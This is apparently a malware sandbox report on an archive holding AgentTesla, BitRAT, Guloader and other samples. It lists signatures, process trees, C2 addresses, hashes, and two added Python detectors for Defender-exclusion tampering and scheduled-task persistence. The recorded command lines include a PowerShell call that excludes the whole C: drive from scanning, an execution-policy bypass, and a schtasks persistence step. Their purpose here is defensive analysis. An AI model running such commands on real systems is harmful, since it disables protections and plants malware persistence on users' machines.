Analysis Overview
SHA256
031527224e74b82bf16e639c666134674ecc8a6e648fed2f68255617bd6a3b18
Threat Level: Known bad
The file 1.zip was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Guloader,Cloudeye
Xloader
BitRAT
suricata: ET MALWARE FormBook CnC Checkin (GET)
Formbook
ServHelper
BitRAT Payload
Xloader Payload
Formbook Payload
AgentTesla Payload
Grants admin privileges
Possible privilege escalation attempt
Blocklisted process makes network request
Sets DLL path for service in the registry
Modifies RDP port number used by Windows
UPX packed file
Loads dropped DLL
Modifies file permissions
Reads user/profile data of web browsers
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: RenamesItself
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious behavior: MapViewOfSection
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Script User-Agent
Runs net.exe
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-07-30 15:26
Signatures
Analysis: behavioral7
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
11s
Max time network
46s
Command Line
Signatures
Reads user/profile data of web browsers
Processes
C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe
"C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe"
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
151s
Max time network
146s
Command Line
Signatures
BitRAT
BitRAT Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2016 set thread context of 2140 | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
Files
memory/2016-114-0x0000000000130000-0x0000000000131000-memory.dmp
memory/2016-116-0x0000000005130000-0x0000000005131000-memory.dmp
memory/2016-117-0x0000000004C30000-0x0000000004C31000-memory.dmp
memory/2016-118-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
memory/2016-119-0x0000000004C30000-0x000000000512E000-memory.dmp
memory/2016-120-0x0000000006C00000-0x0000000006E07000-memory.dmp
memory/2016-121-0x0000000006E90000-0x0000000006E91000-memory.dmp
memory/2016-126-0x0000000006E10000-0x0000000006E7A000-memory.dmp
memory/2016-127-0x00000000079D0000-0x00000000079D1000-memory.dmp
memory/1524-128-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs
| MD5 | 4c3b08d7af0401a66aa7934a5f533276 |
| SHA1 | b5638475f3422d083a825a88a753db5e05666923 |
| SHA256 | 59f8fbd0ff79380d28c47847b14b846dd52ff36b00a08690c4cf5292b8dc5dc4 |
| SHA512 | 5497a31e5d47d2baa3bc43b6677fd8f35b55ed79e25bb831f5ee7c48c32e9aed9323a9b8d96dfc7ebe6ca3d3964f2d85ebaa2203a25b4b142ef2334542d87a0f |
memory/788-130-0x0000000000000000-mapping.dmp
memory/2140-131-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2140-132-0x000000000068A488-mapping.dmp
memory/2140-135-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/788-137-0x0000000006CB0000-0x0000000006CB1000-memory.dmp
memory/788-136-0x0000000006AC0000-0x0000000006AC1000-memory.dmp
memory/788-138-0x00000000072F0000-0x00000000072F1000-memory.dmp
memory/788-139-0x00000000071C0000-0x00000000071C1000-memory.dmp
memory/788-140-0x0000000007260000-0x0000000007261000-memory.dmp
memory/788-141-0x0000000007B70000-0x0000000007B71000-memory.dmp
memory/788-142-0x0000000007C80000-0x0000000007C81000-memory.dmp
memory/788-143-0x0000000006CB2000-0x0000000006CB3000-memory.dmp
memory/788-144-0x0000000007980000-0x0000000007981000-memory.dmp
memory/788-145-0x0000000008260000-0x0000000008261000-memory.dmp
memory/788-154-0x0000000009010000-0x0000000009043000-memory.dmp
memory/788-161-0x0000000006E20000-0x0000000006E21000-memory.dmp
memory/788-166-0x0000000009400000-0x0000000009401000-memory.dmp
memory/788-167-0x0000000009580000-0x0000000009581000-memory.dmp
memory/788-171-0x000000007F110000-0x000000007F111000-memory.dmp
memory/788-172-0x0000000006CB3000-0x0000000006CB4000-memory.dmp
memory/788-362-0x00000000094E0000-0x00000000094E1000-memory.dmp
memory/788-368-0x00000000094C0000-0x00000000094C1000-memory.dmp
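Analyst note on the behavioral19 process tree above. The sample drops a VBS to %TEMP%, runs it through WScript.exe, and has powershell.exe call `Set-MpPreference -ExclusionPath C:\,'...\Moupdate.exe'`; the first entry excludes the entire system drive from on-access scanning, which makes the second entry redundant and tells you the actor was not being subtle. The following is an added detection example, not code from the report or the sandbox vendor: it tokenizes Windows/PowerShell command lines (quotes can appear mid-token, as in the observed `C:\,'C:\Users\...'`), splits the PowerShell array argument on commas outside quotes, and grades each exclusion. The sample records are constructed; the first mirrors the command line shown above, the other two are made up for contrast. The `USER_WRITABLE` pattern is an assumption to tune per estate.

```python
import re

# Added example, not part of the sandbox report: flag Defender exclusion tampering
# of the kind seen in this detonation, where a dropper running from %TEMP% spawns
# powershell.exe with "Set-MpPreference -ExclusionPath C:\,'...\Moupdate.exe'".

# Locations any user process can write to; an exclusion there lets the malware
# stage payloads unscanned. This list is an assumption, tune it to the estate.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
EXCLUSION_PARAMS = {"-exclusionpath", "-exclusionprocess", "-exclusionextension"}


def tokenize(cmdline):
    """Split a Windows/PowerShell command line on whitespace while honouring
    "..." and '...' anywhere inside a token (quotes are kept in the token)."""
    tokens, cur, quote = [], [], None
    for ch in cmdline:
        if quote:
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            cur.append(ch)
        elif ch.isspace():
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def split_ps_array(arg):
    r"""Split a PowerShell array literal such as C:\,'C:\Program Files\x.exe'
    on commas outside quotes and strip the quotes from each element."""
    items, cur, quote = [], [], None
    for ch in arg:
        if quote:
            if ch == quote:
                quote = None
            else:
                cur.append(ch)
        elif ch in "\"'":
            quote = ch
        elif ch == ",":
            items.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    items.append("".join(cur))
    return [i.strip() for i in items if i.strip()]


def classify(entry):
    """Severity of one exclusion entry."""
    if DRIVE_ROOT.match(entry):
        return "critical"   # whole volume excluded from on-access scanning
    if USER_WRITABLE.search(entry):
        return "high"       # user-writable staging location
    return "review"         # any exclusion change deserves a look


def defender_exclusions(cmdline):
    """Return [(parameter, entry, severity)] for every exclusion a
    Set-MpPreference / Add-MpPreference command line introduces."""
    tokens = tokenize(cmdline)
    lowered = [t.strip("\"'").lower() for t in tokens]
    if not any(t in ("set-mppreference", "add-mppreference") for t in lowered):
        return []
    findings = []
    for i, tok in enumerate(lowered):
        if tok in EXCLUSION_PARAMS and i + 1 < len(tokens):
            for entry in split_ps_array(tokens[i + 1]):
                findings.append((tok, entry, classify(entry)))
    return findings


# Constructed process-creation records. The first command line is the one the
# report shows; the other two are made up for contrast.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe",
     "cmdline": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                 r"Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming"
                 r"\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'")},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'powershell.exe -NoProfile Add-MpPreference -ExclusionPath "D:\BuildAgent\work"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -NoProfile Get-MpPreference"},
]


def triage(events):
    """Return the records that add exclusions, with parent context for the alert."""
    hits = []
    for ev in events:
        for param, entry, severity in defender_exclusions(ev["cmdline"]):
            hits.append({"parent": ev["parent"], "param": param,
                         "entry": entry, "severity": severity})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['severity']:8}] {hit['param']} {hit['entry']}  <- {hit['parent']}")
```

Two caveats for a production rule: PowerShell accepts any unambiguous parameter prefix, so match `-ExclusionPa*` rather than the full name, and remember that `Set-MpPreference` replaces the exclusion list while `Add-MpPreference` appends to it, so a "Set" from an unexpected parent is also a sign that previous exclusions were wiped. Independently of process telemetry, Defender records configuration changes as event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, which is the place to confirm what the command actually did.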
Analysis: behavioral31
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:30
Platform
win10v20210410
Max time kernel
0s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
9s
Max time network
134s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe
"C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 172.67.145.153:443 | N/A | tcp |
Files
memory/468-61-0x00000000002E0000-0x00000000002F3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
150s
Max time network
170s
Command Line
Signatures
BitRAT
BitRAT Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 748 set thread context of 624 | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs"
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'
Network
| Country | Destination | Domain | Proto |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
| N/A | 185.244.30.28:4898 | N/A | tcp |
Files
memory/748-60-0x0000000000980000-0x0000000000981000-memory.dmp
memory/748-62-0x0000000000930000-0x0000000000931000-memory.dmp
memory/748-63-0x0000000005C60000-0x0000000005E67000-memory.dmp
memory/748-68-0x0000000004840000-0x00000000048AA000-memory.dmp
memory/1720-69-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs
| MD5 | 4c3b08d7af0401a66aa7934a5f533276 |
| SHA1 | b5638475f3422d083a825a88a753db5e05666923 |
| SHA256 | 59f8fbd0ff79380d28c47847b14b846dd52ff36b00a08690c4cf5292b8dc5dc4 |
| SHA512 | 5497a31e5d47d2baa3bc43b6677fd8f35b55ed79e25bb831f5ee7c48c32e9aed9323a9b8d96dfc7ebe6ca3d3964f2d85ebaa2203a25b4b142ef2334542d87a0f |
memory/1720-71-0x0000000075451000-0x0000000075453000-memory.dmp
memory/1136-73-0x0000000000000000-mapping.dmp
memory/624-74-0x000000000068A488-mapping.dmp
memory/624-72-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/624-77-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/1136-78-0x0000000001ED0000-0x0000000001ED1000-memory.dmp
memory/1136-79-0x00000000048B0000-0x00000000048B1000-memory.dmp
memory/1136-80-0x0000000002650000-0x0000000002651000-memory.dmp
memory/1136-81-0x0000000004870000-0x0000000004871000-memory.dmp
memory/1136-82-0x0000000004872000-0x0000000004873000-memory.dmp
memory/1136-83-0x00000000052C0000-0x00000000052C1000-memory.dmp
memory/1136-86-0x00000000056A0000-0x00000000056A1000-memory.dmp
memory/1136-91-0x00000000056F0000-0x00000000056F1000-memory.dmp
memory/1136-92-0x00000000061F0000-0x00000000061F1000-memory.dmp
memory/1136-99-0x0000000006280000-0x0000000006281000-memory.dmp
memory/1136-100-0x000000007EF30000-0x000000007EF31000-memory.dmp
memory/1136-101-0x0000000005620000-0x0000000005621000-memory.dmp
memory/1136-115-0x0000000006300000-0x0000000006301000-memory.dmp
memory/1136-116-0x0000000006310000-0x0000000006311000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win7v20210410
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.xivstatus.com | udp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
Files
memory/1676-60-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp
memory/1676-61-0x0000000002520000-0x0000000002521000-memory.dmp
memory/1676-62-0x000000001AAE0000-0x000000001AAE1000-memory.dmp
memory/1676-63-0x00000000026F0000-0x00000000026F1000-memory.dmp
memory/1676-65-0x000000001AA64000-0x000000001AA66000-memory.dmp
memory/1676-64-0x000000001AA60000-0x000000001AA62000-memory.dmp
memory/1676-66-0x0000000002470000-0x0000000002471000-memory.dmp
memory/1676-67-0x000000001C2C0000-0x000000001C2C1000-memory.dmp
memory/1676-68-0x000000001AA6A000-0x000000001AA89000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win7v20210410
Max time kernel
108s
Max time network
15s
Command Line
Signatures
AgentTesla
AgentTesla Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\hZpzJs = "C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe" | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2004 set thread context of 1688 | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | C:\Users\Admin\AppData\Local\Temp\87597.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp741.tmp"
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
Network
Files
memory/2004-59-0x00000000008A0000-0x00000000008A1000-memory.dmp
memory/2004-61-0x0000000004840000-0x0000000004841000-memory.dmp
memory/2004-62-0x00000000002E0000-0x00000000002FB000-memory.dmp
memory/2004-63-0x0000000005740000-0x00000000057C0000-memory.dmp
memory/2004-64-0x0000000001EF0000-0x0000000001F2C000-memory.dmp
memory/960-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmp741.tmp
| MD5 | ecde5ed2471122d09c320f97a8711098 |
| SHA1 | 45a1489f61f2373b6dc3d9515348ae5440eade6e |
| SHA256 | bef5ea3be9a7648156b773e67a33d1eb4b0abe2f578731751c2f1a6abc33483e |
| SHA512 | a80eb4a5c6d0d79c29d00d8fd905ebec95e25171f847bbe75fea4b71cce7364e256b8a741dd7b8ba4c26ec3beada0e1218d188c41564ab66bb9a8463ebd616ec |
memory/1688-68-0x00000000004374AE-mapping.dmp
memory/1688-67-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1688-69-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1688-71-0x00000000046E0000-0x00000000046E1000-memory.dmp
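Analyst note on the behavioral5 persistence above. The AgentTesla sample sets a Run key pointing at `%APPDATA%\hZpzJs\hZpzJs.exe` and registers a scheduled task with `schtasks /Create /TN "Updates\emoGDf" /XML tmp741.tmp`; the task name says nothing, the dropped XML says everything, and the dropper usually deletes it, so grab it from the sandbox's file list before relying on the task name. The following is an added example, not code from the report or the sandbox vendor: it pulls `/TN` and `/XML` from the schtasks command line and parses the task definition in the Task Scheduler 2.0 schema to report the action, triggers, principal and the settings that matter. The report gives only the hashes of tmp741.tmp, so the XML body below is constructed; its action path is an assumption taken from the Run key the same sample writes.

```python
import re
import xml.etree.ElementTree as ET

# Added example, not part of the sandbox report: instead of trusting the task
# name ("Updates\emoGDf"), parse the task definition that "schtasks /Create
# ... /XML <file>" registers (Task Scheduler 2.0 XML) and report what it runs.

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
SCHTASKS_ARGS = re.compile(r'/(TN|XML)\s+(?:"([^"]*)"|(\S+))', re.I)


def schtasks_args(cmdline):
    """Extract /TN and /XML values from a schtasks command line (quoted or bare)."""
    out = {}
    for m in SCHTASKS_ARGS.finditer(cmdline):
        out[m.group(1).upper()] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def parse_task(xml_data):
    """Summarise a task definition: action, triggers, principal and the
    settings that matter for persistence. Accepts str or bytes; files written
    by schtasks are UTF-16 with a BOM, which ElementTree handles from bytes."""
    root = ET.fromstring(xml_data)
    ns = root.tag[1:root.tag.index("}")] if root.tag.startswith("{") else ""

    def q(path):  # qualify every step of an ElementPath with the document namespace
        return "/".join(f"{{{ns}}}{step}" if ns else step for step in path.split("/"))

    triggers = [el.tag.rsplit("}", 1)[-1] for el in root.findall(q("Triggers") + "/*")]
    return {
        "command": root.findtext(q("Actions/Exec/Command"), default=""),
        "arguments": root.findtext(q("Actions/Exec/Arguments"), default=""),
        "triggers": triggers,
        "logon_type": root.findtext(q("Principals/Principal/LogonType"), default=""),
        "run_level": root.findtext(q("Principals/Principal/RunLevel"), default=""),
        "hidden": root.findtext(q("Settings/Hidden"), default="false").strip().lower() == "true",
        "time_limit": root.findtext(q("Settings/ExecutionTimeLimit"), default=""),
    }


def task_findings(cmdline, xml_data):
    """Join the command line with the XML it points at and list why it matters."""
    args = schtasks_args(cmdline)
    task = parse_task(xml_data)
    findings = []
    if USER_WRITABLE.search(args.get("XML", "")):
        findings.append("task definition staged in a user-writable directory")
    if USER_WRITABLE.search(task["command"]):
        findings.append("action runs from a user-writable directory")
    if "LogonTrigger" in task["triggers"]:
        findings.append("re-executes at every logon")
    if task["hidden"]:
        findings.append("hidden from the Task Scheduler UI")
    if task["time_limit"] == "PT0S":
        findings.append("no execution time limit (long-lived process)")
    if task["run_level"] == "HighestAvailable":
        findings.append("requests highest available privileges")
    return {"task_name": args.get("TN"), "xml_path": args.get("XML"), **task, "findings": findings}


# Command line as shown in the report.
SAMPLE_CMDLINE = (r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" '
                  r'/XML "C:\Users\Admin\AppData\Local\Temp\tmp741.tmp"')

# Constructed task definition: the report lists only the hashes of tmp741.tmp,
# so this body is an assumption written to the real schema; the action path is
# taken from the Run key the same sample writes.
SAMPLE_TASK_XML = f"""<Task version="1.2" xmlns="{TASK_NS}">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <Hidden>true</Hidden>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe</Command>
    </Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    result = task_findings(SAMPLE_CMDLINE, SAMPLE_TASK_XML)
    print(f"{result['task_name']} -> {result['command']} {result['arguments']}".rstrip())
    for finding in result["findings"]:
        print("  -", finding)
```

On a live host the same parser can be pointed at `C:\Windows\System32\Tasks\<name>` (the registered copy of the definition) when the staged `.tmp` is already gone; pair the result with the Run key value to confirm both persistence paths lead to the same binary.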
Analysis: behavioral15
Detonation Overview
Submitted
